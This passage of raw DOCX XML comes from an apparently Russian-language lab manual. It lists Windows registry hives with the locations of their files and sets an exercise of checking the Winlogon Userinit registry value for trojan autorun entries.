        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2350" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">HKEY_LOCAL_MACHINE\SAM </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2650" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Содержит информацию SAM (Security Access Manager), хранящуюся в файлах SAM, SAM.LOG, SAM.SAV в папке \%System-root%\System32\Confiq</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="696"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2350" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF38D0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>HKEY_LOCAL_MACH!NE\SECURITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2650" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Содержит</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF38D0">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>информацию</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF38D0">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>безопасности</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF38D0">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>в</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF38D0">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>файлах</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF38D0">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> SECURITY.SECURITY.LOG, SECURITY.SAV </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>в</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF38D0">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>папке</w:t>
            </w:r>
            <w:r w:rsidRPr="00FF38D0">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> \%Systemroot%\System32\Confiq</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="984"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2350" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>HKEY_LOCAL_MACHINE\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2650" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6"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color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Содержит информацию об аппаратных профилях этого подраздела. Информация хранится в фа</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>й</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>лахSYSTEM.SYSTEM.LOG, SYSTEM.SAV в папке \%Systemroot%\System32\Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="692"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2350" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4"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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>HKEY_CURRENT_CONFIG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2650" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4"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color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Содержит информацию о подразделе System этого улья, которая хранится в файлах SYSTEM.SAV и SYSTEM.ALT в папке </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>\%Systemroot%\System32\Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="1283"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2350" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4"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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>HKEY_USERS\.DEFAULT</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2650" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4"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color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Содержит информацию, которая будет использоваться для создания профиля н</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>о</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>вого пользователя, впервые регистрир</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>у</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ющегося в системе. Информация храни</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>т</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">ся в файлах DEFAULT, DEFAULT.LOG, DEFAULT.SAV в папке </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">\%Systemroot%\System32\Confiq </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="1529"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2350" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">HKEY_CURRENT_USER  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2650" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6"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color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Содержит информацию о пользователе, зарегистрированном в системе на тек</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>у</w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">щий момент. Эта информация хранится в файлах NTUSER.DAT и - NTUSER.DAT.LOG, расположенных в каталоге </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">\%Systemroot%\Profiles\User </w:t>
            </w:r>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>name, где User name — имя пользователя, зарегистрированного в системе на данный момент</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5798"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:color w:val="FF0000"/>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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5798"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5798"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5798"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Проверить потенциальные места записей вредоносного программн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>го обеспечения в системном реестре операционной системы Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5798"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Алгоритм выполнения работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Потенциальными местами записей «троянских программ» в системном реестре являются разделы, описывающие программы, запускаемые автоматич</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ски при загрузке операционной системы от имени пользователей и системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="528"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустите программу </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>regedit.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="528"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В открывшемся окне выберите ветвь </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">HKEY_LOCAL_MACHINE </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">лее </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Software\ Microsoft\WindowsNT\CurrentVersion\Winlogon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="528"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В правой половине открытого окна программы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">regedit.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>появится список ключей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="528"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Найдите ключ </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Userinit (REG_SZ) </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и проверьте его содержимое.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="528"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>По умолчанию (исходное состояние) 151 этот ключ содержит следу</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">щую запись </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\WINDOWS\system32\userinit.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(рис. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5920740" cy="2636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20740" cy="263652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p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="432"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="173" w:hanging="295"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
